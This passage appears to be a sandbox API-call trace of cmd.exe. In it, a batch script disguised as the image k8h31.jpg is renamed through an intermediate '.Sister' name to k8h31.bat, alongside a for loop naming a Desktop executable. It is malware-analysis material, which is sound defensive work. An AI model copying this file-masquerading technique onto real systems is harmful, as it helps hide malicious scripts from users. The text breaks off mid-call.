??_V@YAXPEAX@Z () returned 0x1 [0293.519] malloc (_Size=0x1ff9c) returned 0x21ed98bfa00 [0293.520] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7f60 [0293.520] FindClose (in: hFindFile=0x21ed8cc7f60 | out: hFindFile=0x21ed8cc7f60) returned 1 [0293.520] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc7960 [0293.520] FindClose (in: hFindFile=0x21ed8cc7960 | out: hFindFile=0x21ed8cc7960) returned 1 [0293.520] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd9858b99, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd9858b99, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8cc7ea0 [0293.520] FindClose (in: hFindFile=0x21ed8cc7ea0 | out: hFindFile=0x21ed8cc7ea0) returned 1 [0293.521] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\k8h31.jpg", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1aaac0, ftCreationTime.dwHighDateTime=0x1d5e299, ftLastAccessTime.dwLowDateTime=0xdec32e50, ftLastAccessTime.dwHighDateTime=0x1d5e94b, ftLastWriteTime.dwLowDateTime=0xdec32e50, ftLastWriteTime.dwHighDateTime=0x1d5e94b, nFileSizeHigh=0x0, nFileSizeLow=0xeb27, dwReserved0=0x4, dwReserved1=0x7, cFileName="k8h31.jpg", cAlternateFileName="")) returned 0x21ed8cc7ea0 [0293.521] FindClose (in: hFindFile=0x21ed8cc7ea0 | out: hFindFile=0x21ed8cc7ea0) returned 1 [0293.521] malloc (_Size=0x1ff9c) returned 0x21ed98df9b0 [0293.522] ??_V@YAXPEAX@Z () returned 0x21ed98df9b0 [0293.523] GetProcessHeap () returned 0x21ed8c70000 [0293.523] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c) returned 0x21ed8d45e60 [0293.523] ??_V@YAXPEAX@Z () returned 0x1 [0293.523] ??_V@YAXPEAX@Z () returned 0x1 [0293.523] GetProcessHeap () returned 0x21ed8c70000 [0293.523] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92d1090, Size=0x110) returned 0x21ed92d1090 [0293.523] GetProcessHeap () returned 0x21ed8c70000 [0293.523] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92d1090) returned 0x110 [0293.523] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0293.523] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.523] GetFileType (hFile=0x50) returned 0x2 [0293.523] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.523] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0293.524] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.524] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0293.531] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.531] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0293.531] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0293.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.531] GetFileType (hFile=0x50) returned 0x2 [0293.531] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.531] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0293.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.531] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0293.532] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.532] GetFileType (hFile=0x50) returned 0x2 [0293.532] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.532] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.533] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.533] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed92d0c60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed92d0c60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.533] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"k8h31.jpg\" \"k8h31.jpg.Sister\" ") returned 32 [0293.533] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.533] GetFileType (hFile=0x50) returned 0x2 [0293.533] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.533] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.535] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x20) returned 1 [0293.539] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0293.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.539] GetFileType (hFile=0x50) returned 0x2 [0293.539] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.539] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.539] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.541] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0293.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.541] GetFileType (hFile=0x50) returned 0x2 [0293.541] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.541] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.542] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0293.542] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0293.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.542] GetFileType (hFile=0x50) returned 0x2 [0293.542] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.542] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.543] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0293.543] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0293.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.543] GetFileType (hFile=0x50) returned 0x2 [0293.543] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.543] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.544] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0293.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.550] GetFileType (hFile=0x50) returned 0x2 [0293.551] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.551] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.551] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed92d1060*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed92d1060*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.552] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"k8h31.jpg.Sister\" \"k8h31.bat\" ") returned 32 [0293.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.552] GetFileType (hFile=0x50) returned 0x2 [0293.552] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.552] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.553] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x20) returned 1 [0293.553] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0293.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.553] GetFileType (hFile=0x50) returned 0x2 [0293.553] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.553] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0293.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.554] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0293.561] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0293.562] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0293.562] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0293.562] malloc (_Size=0xffce) returned 0x21ed98bfa00 [0293.562] ??_V@YAXPEAX@Z () returned 0x21ed98bfa00 [0293.562] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0293.562] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0293.562] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0293.562] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0293.562] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0293.562] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0293.562] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0293.562] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0293.562] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0293.562] ??_V@YAXPEAX@Z () returned 0x1 [0293.562] GetProcessHeap () returned 0x21ed8c70000 [0293.562] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x90) returned 0x21ed8d66010 [0293.562] GetProcessHeap () returned 0x21ed8c70000 [0293.562] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d66010, Size=0x50) returned 0x21ed8cc75a0 [0293.563] GetProcessHeap () returned 0x21ed8c70000 [0293.563] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc75a0) returned 0x50 [0293.563] GetProcessHeap () returned 0x21ed8c70000 [0293.563] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7e40 [0293.563] GetProcessHeap () returned 0x21ed8c70000 [0293.563] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x90) returned 0x21ed8d65a70 [0293.563] GetProcessHeap () returned 0x21ed8c70000 [0293.563] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d65a70, Size=0x50) returned 0x21ed8cc7cc0 [0293.563] GetProcessHeap () returned 0x21ed8c70000 [0293.563] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc7cc0) returned 0x50 [0293.563] malloc (_Size=0xffce) returned 0x21ed98bfa00 [0293.563] ??_V@YAXPEAX@Z () returned 0x21ed98bfa00 [0293.563] GetProcessHeap () returned 0x21ed8c70000 [0293.563] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7f60 [0293.563] GetProcessHeap () returned 0x21ed8c70000 [0293.563] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5ba00 [0293.564] _wcsicmp (_String1="k8h31.jpg", _String2=".") returned 61 [0293.564] _wcsicmp (_String1="k8h31.jpg", _String2="..") returned 61 [0293.564] GetFileAttributesW (lpFileName="k8h31.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\k8h31.jpg")) returned 0x20 [0293.564] GetProcessHeap () returned 0x21ed8c70000 [0293.564] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92d11b0 [0293.565] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed92d11c0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.565] SetErrorMode (uMode=0x0) returned 0x0 [0293.565] SetErrorMode (uMode=0x1) returned 0x0 [0293.565] GetFullPathNameW (in: lpFileName="k8h31.jpg", nBufferLength=0x7fe7, lpBuffer=0x21ed98bfa00, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\k8h31.jpg", lpFilePart=0xa6cf4fd660*="k8h31.jpg") returned 0x22 [0293.565] SetErrorMode (uMode=0x0) returned 0x1 [0293.565] GetProcessHeap () returned 0x21ed8c70000 [0293.565] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5d740 [0293.565] _wcsicmp (_String1="k8h31.jpg", _String2=".") returned 61 [0293.566] _wcsicmp (_String1="k8h31.jpg", _String2="..") returned 61 [0293.566] GetFileAttributesW (lpFileName="k8h31.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\k8h31.jpg")) returned 0x20 [0293.566] ??_V@YAXPEAX@Z () returned 0x1 [0293.566] malloc (_Size=0xffce) returned 0x21ed98bfa00 [0293.566] ??_V@YAXPEAX@Z () returned 0x21ed98bfa00 [0293.566] malloc (_Size=0xffce) returned 0x21ed98cf9e0 [0293.566] ??_V@YAXPEAX@Z () returned 0x21ed98cf9e0 [0293.566] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\k8h31.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\k8h31.jpg")) returned 0x20 [0293.566] malloc (_Size=0xffce) returned 0x21ed98df9c0 [0293.566] ??_V@YAXPEAX@Z () returned 0x21ed98df9c0 [0293.566] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\k8h31.jpg", fInfoLevelId=0x1, lpFindFileData=0x21ed8d5ba10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d5ba10) returned 0x21ed8cc7c00 [0293.566] malloc (_Size=0xffce) returned 0x21ed98ef9a0 [0293.567] ??_V@YAXPEAX@Z () returned 0x21ed98ef9a0 [0293.567] ??_V@YAXPEAX@Z () returned 0x1 [0293.567] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\k8h31.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\k8h31.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\k8h31.jpg.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\k8h31.jpg.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0293.568] FindNextFileW (in: hFindFile=0x21ed8cc7c00, lpFindFileData=0x21ed8d5ba10 | out: lpFindFileData=0x21ed8d5ba10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1aaac0, ftCreationTime.dwHighDateTime=0x1d5e299, ftLastAccessTime.dwLowDateTime=0xdec32e50, ftLastAccessTime.dwHighDateTime=0x1d5e94b, ftLastWriteTime.dwLowDateTime=0xdec32e50, ftLastWriteTime.dwHighDateTime=0x1d5e94b, nFileSizeHigh=0x0, nFileSizeLow=0xeb27, dwReserved0=0x0, dwReserved1=0x0, cFileName="k8h31.jpg", cAlternateFileName="")) returned 0 [0293.570] GetLastError () returned 0x12 [0293.570] FindClose (in: hFindFile=0x21ed8cc7c00 | out: hFindFile=0x21ed8cc7c00) returned 1 [0293.570] ??_V@YAXPEAX@Z () returned 0x1 [0293.570] ??_V@YAXPEAX@Z () returned 0x1 [0293.570] ??_V@YAXPEAX@Z () returned 0x1 [0293.570] ??_V@YAXPEAX@Z () returned 0x1 [0293.570] GetProcessHeap () returned 0x21ed8c70000 [0293.570] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7840 [0293.570] GetProcessHeap () returned 0x21ed8c70000 [0293.570] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c958a0, Size=0x16) returned 0x21ed8c95860 [0293.570] GetProcessHeap () returned 0x21ed8c70000 [0293.570] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95860) returned 0x16 [0293.570] GetProcessHeap () returned 0x21ed8c70000 [0293.570] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45c50, Size=0x20) returned 0x21ed8d45e30 [0293.570] GetProcessHeap () returned 0x21ed8c70000 [0293.570] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45e30) returned 0x20 [0293.570] GetProcessHeap () returned 0x21ed8c70000 [0293.570] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d6bc40 [0293.571] GetProcessHeap () returned 0x21ed8c70000 [0293.571] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6bc40, Size=0xb2) returned 0x21ed937c5f0 [0293.571] GetProcessHeap () returned 0x21ed8c70000 [0293.571] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937c5f0) returned 0xb2 [0293.571] GetProcessHeap () returned 0x21ed8c70000 [0293.571] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed92e11a0 [0293.571] GetProcessHeap () returned 0x21ed8c70000 [0293.571] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92e11a0, Size=0x30) returned 0x21ed92e11a0 [0293.571] GetProcessHeap () returned 0x21ed8c70000 [0293.571] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92e11a0) returned 0x30 [0293.571] GetProcessHeap () returned 0x21ed8c70000 [0293.571] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed92e11e0 [0293.571] malloc (_Size=0x1ff9c) returned 0x21ed98bfa00 [0293.571] GetProcessHeap () returned 0x21ed8c70000 [0293.571] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937cbf0 [0293.571] GetProcessHeap () returned 0x21ed8c70000 [0293.571] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937bab0 [0293.571] ??_V@YAXPEAX@Z () returned 0x1 [0293.571] malloc (_Size=0x1ff9c) returned 0x21ed98bfa00 [0293.571] GetProcessHeap () returned 0x21ed8c70000 [0293.571] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937c6b0 [0293.572] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed98bfa00, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0293.572] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc8140 [0293.572] FindClose (in: hFindFile=0x21ed8cc8140 | out: hFindFile=0x21ed8cc8140) returned 1 [0293.572] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc7600 [0293.572] FindClose (in: hFindFile=0x21ed8cc7600 | out: hFindFile=0x21ed8cc7600) returned 1 [0293.572] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8cc7ea0 [0293.572] FindClose (in: hFindFile=0x21ed8cc7ea0 | out: hFindFile=0x21ed8cc7ea0) returned 1 [0293.573] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0293.573] malloc (_Size=0x1ff9c) returned 0x21ed98df9b0 [0293.573] ??_V@YAXPEAX@Z () returned 0x21ed98df9b0 [0293.573] GetProcessHeap () returned 0x21ed8c70000 [0293.573] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67d30 [0293.573] ??_V@YAXPEAX@Z () returned 0x1 [0293.573] ??_V@YAXPEAX@Z () returned 0x1 [0293.573] GetProcessHeap () returned 0x21ed8c70000 [0293.573] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92e11e0, Size=0x490) returned 0x21ed92e11e0 [0293.573] GetProcessHeap () returned 0x21ed8c70000 [0293.573] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92e11e0) returned 0x490 [0293.573] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0293.573] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.573] GetFileType (hFile=0x50) returned 0x2 [0293.573] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.573] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0293.574] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.574] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, 